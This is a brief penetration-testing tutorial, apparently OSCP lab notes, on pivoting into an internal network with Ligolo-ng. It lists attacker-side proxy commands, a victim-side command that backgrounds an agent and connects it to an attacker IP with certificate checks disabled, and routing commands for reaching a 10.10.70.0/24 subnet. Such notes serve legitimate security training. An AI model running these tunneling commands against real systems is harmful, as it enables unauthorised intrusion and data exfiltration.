Tunneling with Ligolo-ng

Tunneling with Ligolo-ng

Ligolo-ng is a tool used for tunneling network traffic, primarily in penetration testing and security assessments. Its main purpose is to create a secure tunnel between a compromised machine and an attacker's server, allowing the attacker to access internal networks or services that are not directly reachable from the outside. This is especially useful for bypassing firewalls and for exfiltrating data or gaining further access within a target network. Ligolo-ng can support various protocols, making it versatile for different scenarios.

From Attacker Side - Start Server

sudo ligolo-proxy -selfcert
interface_create --name "oscp-chall"

From Victim Side - Connect to Server

start /B ligolo-agent.exe -ignore-cert -connect 192.168.45.188:11601

From Attacker Side - Start Tunneling

Then, from attacker side, after agent joined, run:

session
tunnel_start --tun "oscp-chall"
ifconfig
interface_add_route --name oscp-chall --route 10.10.70.0/24
Ligolo Proxy
Add new route

Now, our machine will able to access internal targets.

Internal Access

Last updated